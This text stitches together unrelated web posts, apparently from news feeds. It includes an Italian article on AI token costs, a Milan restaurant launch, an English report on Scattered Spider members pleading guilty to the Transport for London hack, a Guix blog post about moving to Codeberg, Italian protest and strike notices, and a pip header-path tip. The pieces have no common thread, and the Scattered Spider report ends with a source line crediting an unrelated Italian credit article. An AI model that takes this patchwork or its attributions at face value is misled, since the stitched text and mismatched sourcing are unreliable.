E così, praticamente da un giorno all’altro, i token – oggetto fino a poco fa noto soltanto agli addetti ai lavori – sono diventati uno degli argomenti più discussi dai manager di mezzo mondo. A questo punto, fermiamoci un secondo: che cosa sono i token?
In sintesi estrema, i token sono l’unità di testo fondamentale che i modelli linguistici elaborano quando leggono, interpretano o generano informazioni. Nella maggior parte dei casi, un token non equivale a una parola, ma a una porzione di essa (in inglese, in media, quattro caratteri). Può però anche essere un segno di punteggiatura, uno spazio o un carattere speciale. Nel momento in cui un modello deve elaborare la frase “il gattino sta dormendo sul divano?”, la scompone in token con una forma simile a “il / gatt / ino / sta / dorm / endo / sul / divano / ?”.
Ogni volta che un modello linguistico elabora una forma testuale, indipendentemente dall’obiettivo o dalle mansioni per cui è impiegato, sta quindi elaborando una sequenza di token: li trasforma in rappresentazioni numeriche, li confronta con il contesto già ricevuto e calcola quale token abbia maggiore probabilità di venire dopo. È così che risponde a una domanda, riassume un documento, scrive codice o traduce una frase: non “capendo” le parole, ma prevedendo la sequenza di token più coerente con ciò che gli è stato chiesto. È il meccanismo noto come “next token prediction”.
Un po’ come il consumo elettrico si calcola in kilowattora o il traffico internet in gigabyte, il lavoro svolto da un’intelligenza artificiale generativa si misura in token. Con una differenza: il consumo effettivo può crescere molto rapidamente, perché non dipende solo dalla lunghezza della richiesta o della risposta finale, ma anche dalla quantità di informazioni che il modello deve leggere prima di produrla. Una domanda posta all’inizio di una chat con Claude consumerà quindi meno token della stessa domanda inserita in una lunga conversazione, perché il “contesto” che il modello linguistico deve analizzare è, nel primo caso, molto più ridotto.
Un ultimo elemento importante è che i token sono elementi linguistici nel caso degli LLM, mentre nei modelli che generano immagini possono corrispondere a porzioni di immagine, nei modelli audio a frammenti di suono, nei modelli video a sequenze di informazioni che combinano immagini, movimento e durata. Il principio però resta lo stesso: qualunque sia il contenuto generato — testo, voce, musica, immagini o video — il modello non lo elabora come un blocco unico, ma lo scompone in unità più piccole, le trasforma in numeri e lavora su quelle.
Un altro aspetto importante è che nel corso degli anni, grazie alla crescente efficienza dei modelli, il costo dei token è crollato: se nel 2023 il prezzo di un LLM come GPT-4 era di 30 dollari per milione di token in fase di input (quindi il testo che inseriamo noi) e di 60 dollari in output (quindi quello generato dall’AI), oggi GPT-5.5 costa rispettivamente 5 e 30 dollari. Secondo alcune stime, dal 2020 al 2026 i prezzi medi per token sono calati addirittura di 600 volte.
Ma se il prezzo dei token è crollato – e possiamo sostenere che sia sceso significativamente anche per le società che sviluppano LLM, pur in assenza di dati trasparenti a riguardo – com’è possibile che il passaggio a una tariffa a consumo abbia fatto esplodere i costi, al punto da consumare in pochi mesi l’intero budget annuale di Uber e costringere Meta a limitare l’uso dell’intelligenza artificiale in ufficio?
La ragione è duplice. Da una parte, i modelli più avanzati e basati su “ragionamento” – che scompongono la richiesta in più passaggi – consumano molti più token delle loro controparti tradizionali (e spesso forniscono risposte più lunghe). Dall’altra, la diffusione dei modelli linguistici e il loro utilizzo spesso intensivo (e non mirato) hanno provocato un enorme aumento dei token da elaborare. Un singolo dipendente che usa ogni giorno un modello di frontiera può quindi consumare molti più token rispetto anche solo a due anni fa.
Unendo questi due aspetti, si capisce perché Google – come spiegato dal CEO Sundar Pichai – sia passato in un trimestre da 10 a 16 miliardi di token elaborati ogni minuto. OpenAI ha invece dichiarato che la sua piattaforma API (cioè l’infrastruttura attraverso cui aziende e sviluppatori collegano i propri software ai modelli di OpenAI) è passata da 6 a oltre 15 miliardi di token al minuto tra l’autunno 2025 e la primavera 2026, dopo essere già cresciuta di circa venti volte nei due anni precedenti.
Questa impennata del consumo di token è stata a lungo nascosta dalle tariffe fisse ed è invece improvvisamente diventata evidente con il passaggio a una tariffazione a consumo: “L’intelligenza artificiale è oggi la voce di spesa che sta aumentando più rapidamente dei budget aziendali”, si legge in un report Deloitte di inizio anno. “Alcune società hanno affermato che oggi l’AI consuma fino alla metà della loro spesa in tecnologie dell’informazione. Nonostante il prezzo unitario dei token stia calando, la spesa complessiva delle aziende per i sistemi di intelligenza artificiale, e la loro scala di utilizzo, stanno aumentando. Il numero di utenti, la complessità dei modelli e l’intensità dei carichi di lavoro porteranno probabilmente a un maggiore consumo di token e, di conseguenza, a costi più elevati”.
Il passaggio a una fatturazione a consumo è probabilmente il principale responsabile dell’impennata del fatturato di Anthropic, passato dai 4,8 miliardi di dollari del primo trimestre 2026 ai 10,9 miliardi attesi per il secondo trimestre. Sarà però interessante capire che cosa succederà nel trimestre ancora successivo, quando i manager delle aziende avranno definitivamente fatto i conti con le spese fuori controllo per utilizzare Claude Code, Cowork o gli altri sistemi avanzati di Anthropic: “I costi della computazione sono ormai diventati una priorità per i direttori finanziari e per i consigli d’amministrazione”, ha spiegato al Financial Times Costi Perricos, responsabile AI di Deloitte. “[OpenAI e Anthropic] hanno insegnato a utenti e aziende che l’intelligenza artificiale fosse economica o addirittura gratis, ma le cose non stanno affatto così”.
Carter Busse, dirigente della società di software Workato, ha raccontato sempre al Financial Times come l’utilizzo dell’intelligenza artificiale sia esploso tra i suoi dipendenti non appena hanno iniziato a sfruttare gli agenti AI. La brutta sorpresa è arrivata alla prima fattura a consumo di Anthropic: “La nostra spesa è salita improvvisamente di 7 volte e ho pensato: ‘merda, abbiamo creato un mostro’”, ha spiegato Busse, che adesso sta spronando i suoi dipendenti a usare modelli più economici e in modo più responsabile. Ancora più preoccupanti per i colossi dell’intelligenza artificiale sono le dichiarazioni del presidente di Cisco Jeetu Patel: “Il costo dei token è molto più elevato dell’effettivo valore che essi generano su larga scala”.
Nel momento in cui le aziende iniziano a sobbalzare di fronte alle bollette e a domandarsi se il gioco valga la candela, OpenAI e Anthropic si trovano di fronte a quello che lo stesso Sam Altman ha definito “un enorme problema”. E come si risolve questo problema? Stando alle indiscrezioni, nell’unico modo (per ora) possibile: tagliando i prezzi pur di non perdere clienti, come starebbe per fare OpenAI anticipando una possibile mossa di Anthropic in questa stessa direzione.
Come ha riassunto Ed Zitron sul suo blog, “sono passati meno di tre mesi da quando le aziende hanno iniziato a pagare il vero costo dei servizi basati su LLM e sono già così chiaramente infuriate che sia Anthropic sia OpenAI stanno pianificando di tagliare il prezzo dei loro servizi già in perdita, facendo probabilmente crollare il fatturato mentre aumentano i costi complessivi”.
Il rischio è che i due colossi dell’intelligenza artificiale generativa si trovino alle prese con la più classica alternativa del diavolo: se non tagliano i prezzi, le aziende potrebbero ridurre l’impiego dei modelli linguistici (e come abbiamo visto, parecchie l’hanno già fatto). Se tagliano i prezzi, riducono gli introiti di società già oggi in rosso per decine di miliardi di dollari l’anno.
E qui si crea un secondo vicolo cieco: se le aziende tagliano l’uso dell’AI generativa, a cosa serviranno i 190 gigawatt di capacità elettrica per data center già pianificati, in una corsa globale che secondo McKinsey potrebbe richiedere investimenti fino a 7mila miliardi di dollari entro il 2030? E se invece OpenAI e Anthropic devono tagliare i loro prezzi per non perdere clienti aziendali, come faranno a rispettare i contratti da centinaia e centinaia di miliardi di dollari che hanno sottoscritto con Microsoft, Amazon, Google, CoreWeave e altri fornitori di potenza di calcolo?
A questo punto, viene da chiedersi che cosa potrebbe succedere se anche noi utenti comuni di ChatGPT e Claude fossimo costretti a pagare una tariffa a consumo invece di quelle fisse, che per gli usi più intensivi coprono solo una piccola parte dei costi reali.
In verità, qualcosa del genere si sta già verificando. A partire da giugno 2026, gli utenti di GitHub Copilot – ovvero l’assistente AI per scrivere codice collegato alla piattaforma per la condivisione di progetti software di proprietà di Microsoft – sono passati da un abbonamento fisso mensile a un sistema di fatturazione legato anche al consumo di token. Secondo quanto riporta un utente, il prezzo da lui pagato potrebbe salire da 29 fino a 750 dollari al mese; un altro segnala che nel suo caso il costo potrebbe schizzare fino a 3mila dollari.
Attenzione, perché una parte della responsabilità va attribuita al cosiddetto “vibe-coding”, ovvero la scrittura di codice in cui tutti i passaggi tecnici sono affidati all’intelligenza artificiale, aumentando drasticamente il consumo di token. Difficile però incolpare i “vibe-coders” per il loro uso indiscriminato di Copilot, visto che è stata proprio Microsoft a incoraggiarlo e adesso invece lo punisce con bollette fuori controllo.
E se anche OpenAI e Anthropic, conclusa la guerra al ribasso per conquistare gli utenti, dovessero decidere di far pagare i token in base al consumo? È qualcosa che, in realtà, potrebbe avvenire in un futuro non troppo distante, vista la probabile quotazione in borsa di entrambe e la conseguente necessità di ridurre le stratosferiche perdite (per colmare le quali hanno dovuto raccogliere finanziamenti tra i più elevati della storia) e mostrare bilanci in miglioramento.
A questo punto, la domanda sorge spontanea: quanto dovremmo pagare per usare gli strumenti d’intelligenza artificiale se non avessimo a disposizione tariffe fisse tenute artificialmente basse? Una possibile risposta ce la fornisce una simulazione condotta dalla società di analisi SemiAnalysis. Secondo queste stime, il “vero prezzo” (inteso come il prezzo che pagheremmo se fossimo soggetti ad abbonamenti a consumo pari a quelli delle API) di un abbonamento a ChatGPT da 20 dollari al mese potrebbe arrivare fino a 700 dollari, mentre un abbonamento Pro da 200 dollari può raggiungere anche 14mila dollari (situazione simile per Anthropic).
Il problema, insomma, è sempre lo stesso: l’intelligenza artificiale generativa costa troppo e un modello di business sostenibile non è ancora all’orizzonte. È una situazione che riguarda però soprattutto i più avanzati modelli di frontiera sviluppati negli Stati Uniti. E che potrebbe invece avvantaggiare l’ecosistema AI della Cina.
Il segnale più evidente arriva sempre dal consumo di token. Secondo i dati di OpenRouter, a giugno i tre modelli più utilizzati per quantità di token elaborati sono tutti cinesi: MiMo di Xiaomi, MiniMax e DeepSeek. È un segnale di come una quota crescente dell’uso degli LLM – a partire da quello che avviene all’interno di applicazioni, strumenti di lavoro, agenti e servizi aziendali – si stia spostando verso i più economici modelli made in China.
Ad avvantaggiare la Cina è un mix di fattori, tra cui troviamo l’energia meno cara, i data center più economici, le infrastrutture sostenute dallo stato, l’aggressiva concorrenza interna e il fatto che i modelli siano spesso progettati per consumare meno, grazie a scelte di architettura informatica e anche a causa delle restrizioni che impediscono alla Cina di avere accesso ai chip più avanzati. Il vantaggio cinese diventa ancora più evidente guardando i prezzi: i modelli cinesi più usati costano infatti una frazione dei modelli di punta di OpenAI e Anthropic.
Il prezzo per milione di token è però solo una parte del costo reale. Come ha spiegato il ricercatore indipendente Wong Qi Han a CNA, se un modello sbaglia spesso e quindi richiede più tentativi, funziona peggio in una lingua straniera, ha maggiore latenza o pone problemi di sicurezza e compliance, il risparmio iniziale può essere illusorio. In linea teorica, la metrica decisiva non dovrebbe essere il costo per milione di token, ma quanto spendiamo per ottenere un risultato soddisfacente (per gli utenti comuni) o il ritorno sull’investimento (per le aziende). Il problema è che entrambe queste metriche sono estremamente difficili da misurare.
È possibile che i più costosi modelli statunitensi continueranno a essere usati per le attività complesse, mentre quelli cinesi potrebbero conquistare la fascia più ampia del mercato, quella degli usi quotidiani come supporto professionale o assistente personale.
Tutto è bene quel che finisce bene? Non è detto. Per la Cina, il rischio principale è l’eccessiva concorrenza sui prezzi e la compressione dei margini, che potrebbe mettere a rischio la profittabilità di DeepSeek e compagni. Per gli Stati Uniti, il rischio è invece che essere esclusi (a causa dei prezzi elevati) dalla massa dei casi d’uso quotidiani e ad alto volume causerebbe non tanto (o non solo) una riduzione dei potenziali ricavi, ma potrebbe provocare soprattutto una riduzione della potenza di calcolo necessaria.
Considerando le cifre immense che stanno venendo investite in GPU, cloud e data center, ritrovarsi con una richiesta di potere computazionale inferiore alle attese potrebbe trasformare l’attuale corsa alle infrastrutture in un enorme azzardo finanziario. E a quel punto, la temuta bolla dell’intelligenza artificiale potrebbe scoppiare per davvero.
L'articolo L’economia dei token e il vero prezzo dell’intelligenza artificiale proviene da Guerre di Rete.
Un’oasi cittadina di condivisione che unisce caffetteria, ristorante gourmet con cucina a
vista, pizzeria d’autore e aree esperienziali per famiglie e amanti del relax.
MILANO – Nel cuore pulsante di uno dei quartieri a maggior sviluppo e dinamismo della
città, apre ufficialmente i battenti Cascina Corten, la nuova realtà culinaria ed esperienziale
all’interno di Cascina Merlata Spazio Vivo.
Uno spazio poliedrico e multifunzionale di ampio respiro,
pensato per accogliere i cittadini in ogni momento della giornata, dalle prime luci del
mattino fino a tarda notte.

La struttura nasce con una missione precisa: offrire un’esperienza gastronomica raffinata,
flessibile e accessibile, capace di far sentire ogni ospite come a casa propria, immerso in
una suggestiva cornice verde.

Dalla colazione alla cena: il ritmo della giornata a Cascina Corten
La proposta si adatta fluidamente alle esigenze di una clientela diversificata e dinamica:
● Il Mattino (dalle 07:00): Una colazione curata, con una selezione di caffetteria
nazionale e internazionale per iniziare la giornata con il piede giusto.
● Il Pranzo: Soluzioni rapide, gustose e di alta qualità, pensate specificamente per i
professionisti e i lavoratori dei vicini uffici della zona.
● L’Aperitivo al Tramonto: Un’atmosfera conviviale in cui rilassarsi con un drink,
incontrando amici e parenti tra una chiacchiera e l’altra.
● La Cena e la Pizzeria: Una proposta attenta alle tradizioni culinarie ma aperta
all’innovazione, arricchita da un’elegante pizzeria. Al primo piano, gli ospiti potranno
vivere l’esperienza di un ristorante gourmet.
● Brunch: Un appuntamento fisso per rigenerarsi nel weekend, che unisce il calore
della tradizione ai trend internazionali. Una proposta ricca e flessibile che spazia
dalle dolci tentazioni della pasticceria artigianale a piatti salati ricercati, uova
preparate al momento e sfiziosità gourmet.

Un design ripensato tra interno ed esterno.
Il progetto ha previsto una profonda riorganizzazione della struttura, valorizzando sia gli
spazi interni che le ampie aree verdi esterne:
● Interni Luminosi ed Eleganti: Ambienti moderni tinti con tonalità pastello,
illuminazione LED e un grande bancone multifunzionale in materiali naturali.
● Primo Piano: La zona pizzeria è stata impreziosita da una struttura interamente in
vetro che la rende visibile e attrattiva anche dall’esterno.
● Le Aree Esterne Modulari: Un piazzale con gazebi rimovibili per gli eventi all’aperto,
una zona relax sul prato con divanetti e pouf , e un’innovativa area “mare” con
ombrelloni e fondo parzialmente sabbioso per ricreare un’atmosfera balneare in
piena città.

Strizza l’occhio alle famiglie
Cascina Corten si distingue nettamente nel panorama locale per l’estrema
personalizzazione del servizio (dalle insalate su misura alle pizze componibili) e per una
spiccata attenzione al mondo kids.

–
L'articolo Milano si rifà il look nel verde: nasce “Cascina Corten”, il nuovo polo poliedrico del gusto a Cascina Merlata Spazio Vivo proviene da InfoMilano.news.
Two men pleaded guilty in the United Kingdom this week to criminal charges stemming from an August 2024 cyberattack that crippled Transport for London, the entity responsible for the public transport network in the Greater London area. The duo were key members of a prolific cybercrime group known as Scattered Spider, and their guilty pleas came on the first day of what was expected to be a six-week trial.

Owen Flowers (left) 18, and Thalha Jubair, 20. Image: UK National Crime Agency (NCA).
Thalha Jubair, 20, of East London and 18-year-old Owen Flowers of Walsall admitted conspiring to commit unauthorized acts against Transport for London computer systems and causing risk of serious damage to human welfare. According to a report from the BBC, Flowers alone admitted to being part of a conspiracy to hack into U.S. based healthcare providers SSM Health Care Corporation and Sutter Health in September 2024.
Jubair is also wanted by U.S. law enforcement agencies. In September 2025, prosecutors in New Jersey unsealed an indictment alleging Jubair and other Scattered Spider members committed computer fraud, wire fraud, and money laundering in relation to 120 computer network intrusions involving 47 U.S. entities between May 2022 and September 2025, and that the group’s victims paid at least $115 million in ransom payments.
In July 2025, KrebsOnSecurity reported that Flowers and Jubair were arrested in the United Kingdom in connection with Scattered Spider ransom attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. Multiple sources familiar with those investigations said Flowers was the Scattered Spider member who anonymously gave interviews to the media in the days after the group’s September 2023 ransomware attacks disrupted operations at Las Vegas casinos operated by MGM Resorts and Caesars Entertainment.
According to prosecutors, Jubair co-ran a bustling Telegram channel called Star Chat, the home of a SIM-swapping group that used voice- and SMS-based phishing attacks to steal credentials from employees at the major wireless providers in the U.S. and U.K. The group would then use that access to sell a service that could redirect a target’s phone number to a device the attackers controlled and intercept the victim’s calls and text messages (including one-time codes for multi-factor authentication).

A receipt from Star Fraud Chat’s SIM-swapping service targeting a T-Mobile customer after the group gained access to internal T-Mobile employee tools. “Rocket Ace” was one of Jubair’s hacker handles, according to U.S. prosecutors.
New Jersey prosecutors also allege Jubair also was involved in a mass SMS phishing campaign during the summer of 2022 that stole single sign-on credentials from employees at hundreds of companies. That weeks-long SMS phishing campaign led to intrusions and data thefts at more than 130 organizations, including LastPass, DoorDash, Mailchimp, Plex and Signal.
KrebsOnSecurity reported last year that one of Jubair’s alter egos at age 15 was “Everlynn,” a hacker who sold fraudulent “emergency data requests” that used compromised police and government email addresses to demand subscriber data (e.g. username, IP/email address) from major tech companies, claiming the requests concerned urgent matters of life and death and could not wait for a court order.
In April 2026, 24-year-old British national and Scattered Spider member Tyler “Tylerb” Buchanan pleaded guilty to wire fraud conspiracy and aggravated identity theft for participating in the group’s SMS phishing spree in the summer of 2022. The government said Buchanan, Jubair and others used the credentials harvested in that phishing campaign to steal at least $8 million in cryptocurrency from victims throughout the United States. Buchanan is currently scheduled to be sentenced on October 2.
In August 2025, 20-year-old Scattered Spider member from Florida named Noah Michael Urban was sentenced to 10 years in federal prison and ordered to pay $13 million in restitution, after pleading guilty to charges of wire fraud and conspiracy.
The U.S. Department of Justice says three alleged Scattered Spider defendants indicted along with Buchanan still face charges, including Ahmed Hossam Eldin Elbadawy, 24, a.k.a. “AD,” of College Station, Texas; Evans Onyeaka Osiebo, 21, of Dallas, Texas; and Joel Martin Evans, 26, a.k.a. “joeleoli,” of Jacksonville, North Carolina.
Flowers and Jubair are slated to be sentenced in a London court on July 15, 2026.

L'articolo Dalla banca allo smartphone: come cambia l’accesso al credito digitale proviene da FullPress.







A year ago, Guix migrated to Codeberg for source code hosting, issue tracking, and pull requests. This is a significant change for a project with more than 400 people contributing code each year, after more than decade hosting code at Savannah and dealing with bug reports and patches by email, tracked by a Debbugs instance. This article discusses the process that led to this change and lists some takeaways, a year later.
For years before, the question of our choice of source code hosting and collaboration tools would regularly come up. However, with a community effectively built around the existing tools and workflows, a change to a pull-request workflow was far from obvious—even if many would admit that yes, pull requests are more familiar to many younger hackers than patches and bug reports by email.
Active contributors were efficient with the email workflow—often thanks to Emacs and/or to top-notch email clients—while at the same time being critical of “modern” Web-based forges: after all, Debbugs weighs in at a few hundred lines of Perl, building upon the battle-tested standards and built-in federation of email, whereas a forge like Forgejo is much bigger with hundreds of Go dependencies.
A further complication is that, over time, contributors had built tools around this workflow: mumi would provide a nice web interface to Debbugs and the Quality Assurance service would automatically apply patch series in a Git branch and build packages from that branch—to give the most visible examples. Migrating was all but obvious.
Despite these achievements, dissatisfaction was palpable though, even more so when Steve George (a.k.a. Futurile) published the results of the first user and contributor survey in January 2025, with feedback from no less than 900 people. For contributors who took part in the survey, the email workflow was often mentioned as a hindrance.
As if things were not difficult enough, there was no “benevolent dictator” that the project could rely on to make a sharp decision. Instead, in December 2024, the project adopted a process for collective decision-making: the Guix Consensus Document (GCD) process. The process is ambitious: instead of merely asking “project members” (a concept that needs to be properly defined!) to vote on proposals, authors of proposals are expected to work with everyone to build consensus on the proposal; participants cannot merely “oppose” a proposal but should instead express their needs and suggest concrete changes to address them. At the end of the process, participants can “support”, “accept”, or “disapprove” the final revision of the proposal.
It is too early to tell whether the GCD process will stand the test of time—as of this writing seven proposals were submitted through this process, with varying outcomes—but it surely proved to be a good way to work collectively on the forge migration issue, which was the first real-world use of the GCD process.
GCD 002 was submitted in February 2025 as a proposal to migrate to Codeberg for source code hosting and collaboration. The discussion lasted for two months—the maximum duration permitted by the process—with contributions by many people. Two thirds of the Guix team members participated in the deliberation, among which 72% expressed “support” while the remaining 28% merely “accepted” the proposal; nobody “disapproved” it so the proposal came into force in early May 2025.
The discussion showed that many long-time contributors were not comfortable with the idea of moving to a workflow largely perceived as Web-first and inefficient compared to the email workflow. The idea of abandoning part of the infrastructure carefully built around the email workflow over the years was also unappealing. Yet, the prospect of reaching out to a broader community and improving the developer experience for many was probably a driving force that led to this positive outcome.
One thing in the proposal that didn’t trigger much debate though is the preference both for a free-software-based forge and for one hosted by a non-profit, Codeberg e.V. This choice is very much in line with the Guix ethos.
As agreed-upon in the GCD, the switch to Codeberg was incremental: the main repository was migrated on May 25th, 2025, with the former repository still available as a mirror today; the former issue and patch tracker was kept active until January 1st, 2026, when Codeberg issues and pull requests became the only supported mechanisms (but older bug reports and patches remain accessible on-line).
Thanks to the planning devised during the consensus-building discussion, there were few hiccups and surprises when we switched. The quality of service achieved by the Codeberg e.V. employees and volunteers has been very good and the occasional downtime was usually short and clearly communicated.
For some of us, the main difficulty was to adapt to the new workflow.
For those who prefer a workflow out of the browser, the good news is
that Emacs interfaces—fj.el
and more recently
Emacs-Forgejo—have
been getting better everyday thanks to their amazing developers; the
ability to create pull requests using the AGit
workflow
has also helped bring peace and harmony.
The one issue that wasn’t sufficiently anticipated is continuous integration for pull requests. The part of qa.guix.gnu.org that would previously build packages for patches sent by email was not ported to Codeberg. For several months, it was up to reviewers to make sure that pull requests would not break anything—a situation that was not sustainable.

In September 2025, an instance of
Cuirass was set up at
pulls.ci.guix.gnu.org to
finally build pull requests. This was initially seen as a
stopgap because of
several limitations compared to what qa.guix.gnu.org would previously
do—such as the fact that packages now get built for a single
architecture. However, one advantage for newcomers is that feedback is
immediately visible: Cuirass sends reports indicating success or failure
directly in pull requests as
guix-cuirass-bot.
One of the intuitions and hope we had when we decided to migrate to Codeberg is that the pull-request workflow and its Web interface would allow us to reach out to a broader set of contributors. How did it go?
A first insight is that the commit rate—measured as the number of commits pushed on the main branch—is a noisy metric that doesn’t reveal much. What we see by looking at the period from May 2024 to May 2026 (so one year before and one year after the migration) essentially shows that the commit rate remained essentially between “high” and “very high”:
(As an aside, where are the tools to plot statistics like this from a Git repository? I found myself hacking something together.)
Looking at contributions is more insightful. The plot below shows the number of monthly commit authors, the number of monthly committers, and the number of new commit authors each month (people who authored a commit for the first time in the Git history) for that same period.
The number of monthly authors, including new authors, keeps growing. There was a peak both in the number of authors and number of newcomers in June 2025, right after the migration to Codeberg, but for the rest growth appears to be comparable in the 2025–2026 half and in the 2024–2025 half. Guix keeps attracting new contributors but there wasn’t a significant “Codeberg effect”.
The slight increase in number of monthly committers compared to the sharper increase in number of authors might suggest that committers are more “productive”, handling more contributions.
Since the user survey highlighted some contributors were frustrated by the delay or the lack of response on contributed patches—a problem that many free software projects struggle with—a question is how well Guix deals with that today. The graph below shows the creation and closing rate of pull requests per month over the past year, together with the monthly backlog (pull requests opened the month before or earlier and still opened). This data was acquired using the amazing Forgejo interface.
This again shows an impressive rate of incoming code—more than 500 pull requests opened each month!—and an equally impressive, but slightly lower, merge rate, leading to a constantly-increasing backlog. A similar backlog was observed on Debbugs before. Today, there are about 639 opened pull requests out of 6,459 ever opened, or 10%; for comparison, Nixpkgs has 12k opened pull requests out of 473k ever opened, or 2.5%. This concerning backlog in Guix can perhaps be attributed to excessive friction and/or insufficient continuous integration feedback.
One source of friction is the requirement for each commit to be signed by an authorized committer. Unlike many other projects, including Nixpkgs, this requirement means that a person needs to take responsibility and to apply and sign changes they merge, as opposed to just clicking the “Merge” button. In a way, we’re trading developer convenience for user security. It’s a tradeoff we’re willing to make because we care about securing the “software supply chain”, but we have yet to see if this cost can be mitigated in some way.
On the bright side, and although this is harder to measure, one positive impact of the move to Codeberg is that activity within the project is more legible. I already mentioned continuous integration that provides feedback directly in pull requests, such that contributors immediately discover it, but there’s more.
Guix teams
are reified as Codeberg teams and their scope is given the CODEOWNERS
file such
that the right people are pinged. A bot also adds a corresponding
label—e.g., the team-python label for what’s in the scope of the
Python team—allowing for issue and pull request filtering by label.
However, teams are not notified of issues tagged with the corresponding
label, which is
irritating.
Other features such as cross-references among issues/pull requests as well as milestones also appear to facilitate collaboration.
This is nice and all but there’s still room for improvement.
Our infrastructure could use some help. Build power for pulls.ci.guix.gnu.org should be increased, ideally with also more diversity—building for non-x86 architectures would be great! Cuirass itself has a number of shortcomings; some are being addressed for the upcoming 1.4.x series but there’s more work to be done. And also, pulls.ci.guix.gnu.org remains very much package-oriented; it would be nice, when appropriate, to run system tests as well.
The packager workflow still leaves a bit to be desired, in particular with regards to topic branches and world rebuild scheduling, which is still mostly tied to… our otherwise retired bug tracker.
We also want to remain good citizens, not causing excessive load on Codeberg servers (oops!) and keeping an eye on storage use: a single “fork” of Guix could exceed Codeberg’s new per-user quota of 750 MiB. The solution would be to require new contributors to use the AGit workflow to create pull requests. AGit is already popular among Guix contributors; however, the idea of requiring it is seen as a “downgrade” by some because it lacks the familiarity of the “regular” pull request workflow. One way to mitigate that might be to make it more discoverable with an “AGit fork” icon as was done for Gentoo.
Part of being a good citizen, for Guix and for Codeberg e.V., is listening to and accounting for one another’s concern, and this has worked beautifully so far. Guix Foundation recently voted to become a supporting (non-voting) member of Codeberg e.V. as a way to express gratitude and support.
Oh, breaking news: a pull request adding Forgejo and a service to set it up on Guix has just been submitted! Purely declarative configuration, fully reproducible deployment of a forge—can you imagine⁈ Symbiosis at play.
Many thanks to Steve “Futurile” George, Noé Lopez, and Maxim Cournoyer for reviewing an earlier draft of this post.
Il 23 giugno si svolgerà un'altra asta di vendita dell'area verde di Via Goito, un importantissimo polmone verde di 6 ettari, vitale per la nostra città.
Dopo tre infami tentativi di vendere gli orti all’asta, ci troviamo ancora ad assistere al misero tentativo di speculazione edilizia ai danni di uno degli ultimi polmoni verdi di via Goito, diventato nel corso degli anni simbolo di resistenza attiva contro ogni forma di cementificazione.
L'amministrazione comunale avrebbe avuto la possibilità di cambiarne la destinazione d'uso, togliendo di fatto l'edificabilità, oppure acquistare il terreno. Ma preferisce non farlo, condannandolo all'ennesima speculazione edilizia che la nostra città sarà costretta a subire.
Scendiamo in piazza uniti per esprimere il nostro dissenso: non un centimetro di cemento verrà colato.
No alla distruzione del Parco di via Goito!



Did your pip install fail with longintrepr.h: No such file or directory? The file likely is on your system, but it sometime or another it was moved, from /usr/include/python3.xx/longintrepr.h to /usr/include/python3.xx/cpython/longintrepr.h. The proper fix is to update the package in question with the new path, but if you’re installing an old version of something or a package that’s no longer maintained you can work around it like this:
ln -s /usr/include/python3.*/cpython/longintrepr.h .venv/include
USB proclama per mercoledì 24 giugno uno sciopero di 24 ore di tutti i lavoratori e le lavoratrici del polo siderurgico di Piombino, in concomitanza con l'incontro convocato presso la Regione Toscana.
A distanza di mesi dagli annunci e dagli impegni assunti, il quadro industriale continua a essere caratterizzato da incertezze, ritardi e mancanza di garanzie.
La firma dell'Accordo di Programma da parte di JSW non è ancora arrivata. Sul fronte Metinvest registriamo continui slittamenti rispetto al cronoprogramma presentato. Nel frattempo la guerra in Ucraina, elemento che incide direttamente sulle prospettive del progetto, è tutt'altro che conclusa e continua ad alimentare dubbi sulla reale sostenibilità degli investimenti annunciati.
Ancora più grave è l'assenza di qualsiasi concreta clausola di salvaguardia occupazionale capace di garantire il futuro dei lavoratori coinvolti nei processi di riconversione e rilancio del sito.
USB denuncia inoltre le crescenti difficoltà di convivenza industriale tra i due soggetti privati chiamati a operare nell'area siderurgica. Una situazione che rischia di trasformare Piombino nell'ennesimo laboratorio di promesse mancate, mentre il tempo passa e il prezzo continua a essere pagato esclusivamente dai lavoratori, dalle loro famiglie e dall'intero territorio.
Eppure il polo siderurgico di Piombino viene indicato dal Governo e dal Ministero delle Imprese e del Made in Italy come un sito strategico per l'interesse nazionale. Se davvero è così, non è più accettabile assistere all'ennesima sequenza di rinvii, incertezze e continui impieghi di risorse pubbliche senza risultati concreti sul piano industriale e occupazionale.
Per USB, dopo questi mesi di attese e promesse disattese, è necessario cambiare radicalmente approccio.
Il Governo deve esercitare i poteri della Gold Power e assumere un ruolo diretto nel futuro del polo siderurgico di Piombino, fino alla nazionalizzazione dell'asset strategico, garantendo investimenti, occupazione, tutela salariale e una reale prospettiva industriale per il territorio.
Non possiamo più permettere che il futuro di migliaia di lavoratori e di un settore strategico per il Paese resti ostaggio di interessi privati, ritardi e operazioni che finora hanno prodotto soltanto incertezza.
L'unico prezzo pagato fino ad oggi è stato quello imposto ai lavoratori e alle lavoratrici, costretti a vivere anni di ammortizzatori sociali, precarietà e mancanza di prospettive, mentre il territorio continua a subire gli effetti di una crisi che sembra non avere fine.
Mercoledì 24 giugno fermiamo il polo siderurgico di Piombino.
Per il lavoro, per l'industria, per il territorio.
USB PIOMBINO
USB INDUSTRIA NAZIONALE – CATEGORIA OPERAIA

La giornata del 18 giugno a Livorno si è aperta con una conferenza stampa e un presidio al Varco Valessini, promossi da USB e partecipati dalle realtà livornesi con cui da mesi condividiamo il percorso di mobilitazione a sostegno del popolo palestinese, insieme a realtà del territorio pisano, tra cui il Movimento No Base e il Coordinamento per il Boicottaggio di Israele.
Gli interventi che si sono susseguiti hanno espresso sostegno al passaggio nel nostro territorio delle imbarcazioni della Global Intifada e la Ghassan Kanafani di Freedom Flotilla Italia, impegnate in un viaggio lungo le coste italiane con l'obiettivo di contribuire alla rottura dell'assedio imposto a Gaza, denunciare la complicità dei governi europei con il governo israeliano e contrastare il traffico di armi dirette verso la Palestina.
Le finalità di questa iniziativa sono pienamente coerenti con il percorso di lotta che le realtà presenti portano avanti nei rispettivi territori. Da tempo denunciamo e contrastiamo, con tutti gli strumenti a nostra disposizione, il transito di armamenti nei porti e l'utilizzo delle infrastrutture portuali per attività e finalità militari.
In questo quadro si inserisce anche la richiesta avanzata da Drass di ottenere una concessione su una banchina dell'area portuale di Livorno, sottraendo spazi all'uso civile del porto per destinarli ad attività legate al settore militare, nello specifico ai test di sommergibili destinati all'Indonesia.
A ciò si aggiungono il traffico di armamenti e il ruolo di hub logistico militare svolto dal porto di Livorno nel collegamento, via mare e via terra, con la base statunitense di Camp Darby.
